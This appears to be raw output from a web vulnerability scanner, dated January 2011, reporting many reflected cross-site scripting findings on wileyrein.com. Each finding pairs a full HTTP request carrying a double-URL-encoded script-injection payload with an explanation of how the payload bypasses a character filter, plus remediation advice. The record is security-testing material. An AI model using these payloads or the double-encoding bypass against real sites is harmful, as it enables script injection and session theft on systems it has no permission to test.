GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
